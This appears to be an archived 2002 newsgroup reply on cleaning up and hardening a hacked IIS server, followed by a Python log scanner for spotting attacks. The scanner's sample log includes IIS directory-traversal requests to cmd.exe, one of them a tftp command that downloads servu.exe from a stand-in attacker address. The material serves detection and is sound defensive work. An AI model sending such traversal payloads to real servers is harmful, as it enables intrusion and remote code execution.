Re: Open Ports....How to block them all....?

From: Karl Levinson [x y] mvp (levinson_k@excite.com)
Date: 11/19/02


From: "Karl Levinson [x y] mvp" <levinson_k@excite.com>
Date: Tue, 19 Nov 2002 12:13:11 -0500


"Curt_C [MVP]" <Software_AT_Darkfalz.com> wrote in message
news:#IgLW29jCHA.1652@tkmsftngp11...
> Ok, here's the situation. Win2k Server running IIS, AD, Exch2000, SQL2000
>
> I keep it up to date with SP's and Patches but find that the server keeps
> getting hacked and used as an "FTP" server with that stupid "Serv-U" app.
> What can be done to secure this server so that this doesn't keep
> happening?
> Is port blocking (leaving only bare necessity open) my only recourse? If
> so, how?
>
> I'm a developer, and know only basic fundamentals of OS/IIS security.....
>
> Thanks
>
> (P.S... I keep manually killing the app that gets installed and manually
> deleting the files/app/dirs that the hack creates.)

This is pretty common. Frequently this happens through an IIS
vulnerability. If this is the case, check your IIS logs for anything
mentioning .EXE or % and that also has a code 200 or 502 in that line. This
may show you exactly what is happening. More information:
http://securityadmin.info/faq.htm#iislogs2
http://securityadmin.info/faq.htm#iislogs

Once your server has been hacked, you may want to consider formatting and
reinstalling Windows and everything else. You can choose not to do this,
however you are risking leaving other back doors on your system that might
allow future compromise. Installing Serv-U software typically involves a
person having the ability to remotely run commands and install files on your
system, which is pretty serious. They could have dumped your SAM file and
gotten all your local passwords, for example, using this method. Be sure to
do forensic investigation first to try to determine how this happened, so
that you can prevent it from happening next time and try to confirm that
other computers were not also compromised.

Tools to detect hacking include Vision, which is free from
www.foundstone.com/knowledge, a firewall such as www.sygate.com which is
free, antivirus with the latest updates such as the free www.grisoft.com,
anti-trojan software such as www.pestpatrol.com, a file change checker such
as the free one from www.gfi.com, Startup Cop downloaded from
www.download.com or www.google.com, etc.

More information on how to use these tools to detect hacking is detailed at:
http://securityadmin.info/faq.htm#hacked

Ways to secure your system are detailed at:
http://securityadmin.info/faq.htm#re-secure
http://securityadmin.info/faq.htm#harden <-- most important
http://securityadmin.info/faq.htm#firewall
http://securityadmin.info/faq.htm#virus

Specifically, I would try running the MBSA which is free from
www.microsoft.com/download, be sure you have installed IISLockdown including
URLScan which I am guessing probably would have prevented this attack, and
follow one or more hardening checklists on how to secure both IIS and
Windows. It also sounds like you could use antivirus like www.grisoft.com
[free], anti-trojan software like www.pestpatrol.com, and one or more
software or hardware firewall solutions, such as www.sygate.com [which is
free for non-commercial use].

Remember that security is not just patches but also proper configuration and
third party hardening tools. A system with all the patches can still be
easily hacked if you didn't also make changes to the IIS configuration,
disable unnecessary services, etc. This is all stuff I would do LAST, after
discovering the vulnerability and intrusion method and securing the system
in whatever way you choose.
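The IIS log check Karl describes above (lines mentioning .EXE or % that also carry a 200 or 502 status), as an added example that is not part of the original post: a small Python parser for the W3C extended log format IIS writes, run over a constructed sample log. The column names come from the log's own #Fields directive; the client addresses, timestamps and request lines in the sample are made up for illustration and are not from any real server.

```python
"""Scan an IIS W3C extended log for the pattern described in the post:
requests whose URI mentions .EXE or contains a % escape and that were
answered with status 200 or 502.  Added example, not from the original post."""

from collections import Counter
from typing import Dict, List

# Constructed sample log (made-up hosts and requests, not real traffic).
# IIS writes one request per line, space-separated, and names the columns
# in a "#Fields:" directive; spaces inside a field are logged as "+".
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2002-11-18 03:12:00
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2002-11-18 03:12:44 203.0.113.7 - 192.0.2.10 80 GET /default.asp - 200 Mozilla/4.0+(compatible;+MSIE+6.0)
2002-11-18 03:13:01 203.0.113.7 - 192.0.2.10 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\\ 200 -
2002-11-18 03:13:09 203.0.113.7 - 192.0.2.10 80 GET /scripts/..%255c../winnt/system32/cmd.exe /c+tftp+-i+203.0.113.7+GET+servu.exe 502 -
2002-11-18 03:14:00 198.51.100.5 - 192.0.2.10 80 GET /images/logo.gif - 304 -
2002-11-18 03:15:22 198.51.100.5 - 192.0.2.10 80 GET /scripts/cmd.exe /c+dir 404 -
"""

SUSPICIOUS_STATUS = {"200", "502"}


def parse_w3c(text: str) -> List[Dict[str, str]]:
    """Parse W3C extended log text into one dict per request, keyed by the
    column names from the most recent #Fields directive.  Lines whose column
    count does not match the header are skipped rather than mis-aligned."""
    fields: List[str] = []
    rows: List[Dict[str, str]] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue
        values = line.split(" ")
        if fields and len(values) == len(fields):
            rows.append(dict(zip(fields, values)))
    return rows


def is_suspicious(row: Dict[str, str]) -> bool:
    """The post's heuristic: .EXE or a % escape in the requested URI (stem or
    query) combined with a 200 or 502 status.  A 404 on the same URI is only
    a failed probe; 200 means the request was served, and 502 is what IIS
    typically returns when the spawned program did not hand back valid HTTP
    headers, i.e. the command most likely ran."""
    uri = row.get("cs-uri-stem", "") + " " + row.get("cs-uri-query", "")
    mentions_exe_or_escape = ".exe" in uri.lower() or "%" in uri
    return mentions_exe_or_escape and row.get("sc-status") in SUSPICIOUS_STATUS


def find_suspicious(rows: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return the log rows that match the heuristic, in log order."""
    return [row for row in rows if is_suspicious(row)]


def suspicious_sources(hits: List[Dict[str, str]]) -> Dict[str, int]:
    """Count hits per client address; the top entries are the hosts whose
    traffic should be pulled in full for the forensic review."""
    return dict(Counter(row["c-ip"] for row in hits))


if __name__ == "__main__":
    hits = find_suspicious(parse_w3c(SAMPLE_LOG))
    for row in hits:
        print(row["date"], row["time"], row["c-ip"], row["sc-status"],
              row["cs-uri-stem"], row["cs-uri-query"])
    print("per-source counts:", suspicious_sources(hits))
```

Point `parse_w3c` at the contents of the files under the W3SVC log directory (one file per day by default) and review every hit by hand: the heuristic is deliberately broad, so a legitimate .exe download served with 200 will show up too, but a cmd.exe path with a traversal sequence and a 200 or 502 is exactly the evidence Karl is asking for. The 404 on the last sample line is the same attacker tool probing a path that did not exist, which is why the status filter matters.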


